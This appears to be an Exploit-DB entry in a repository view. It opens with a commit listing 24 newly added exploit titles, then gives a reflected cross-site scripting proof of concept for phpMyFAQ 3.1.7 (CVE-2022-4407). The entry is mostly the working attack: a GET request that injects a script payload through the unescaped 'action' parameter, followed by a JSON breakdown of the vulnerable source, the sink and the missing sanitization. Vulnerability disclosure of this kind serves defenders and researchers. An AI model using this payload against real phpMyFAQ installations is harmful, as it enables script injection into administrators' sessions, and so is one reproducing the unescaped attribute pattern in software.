7ebfc36557
24 changes to exploits/shellcodes/ghdb ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) Ruckus IoT Controller 1.7.1.0 - Undocumented Backdoor Account Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE) FLIR AX8 1.46.16 - Remote Command Injection ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF) Ethercreative Logs 3.0.3 - Path Traversal Garage Management System 1.0 (categoriesName) - Stored XSS Nagios Log Server 2024R1.3.1 - Stored XSS ProConf 6.0 - Insecure Direct Object Reference (IDOR) Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS) WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) - File Write DoS ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) - Remote Code Execution Car Rental Project 1.0 - Remote Code Execution KodExplorer 4.52 - Open Redirect NagVis 1.9.33 - Arbitrary File Read phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS) phpMyFAQ 3.2.10 - Unintended File Download Triggered by Embedded Frames Smart Manager 8.27.0 - Post-Authenticated SQL Injection Zabbix 7.0.0 - SQL Injection Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE) Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
28 lines
No EOL
1.4 KiB
Text
28 lines
No EOL
1.4 KiB
Text
# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
|
|
# Date: 2024-10-26
|
|
# Exploit Author: CodeSecLab
|
|
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
|
|
# Software Link: https://github.com/thorsten/phpMyFAQ
|
|
# Version: 3.1.7
|
|
# Tested on: Ubuntu Windows
|
|
# CVE : CVE-2022-4407
|
|
|
|
PoC:
|
|
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>
|
|
|
|
Details:
|
|
{
|
|
"Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
|
|
"Vulnerable Variable": "action",
|
|
"Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
|
|
"Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
|
|
"Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
|
|
"Attack Payload": "\"><script>alert('XSS')</script>",
|
|
"Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
|
|
"Request Parameters": "action",
|
|
"Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
|
|
"Request Method": "GET",
|
|
"Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
|
|
}
|
|
|
|
[Replace Your Domain Name] |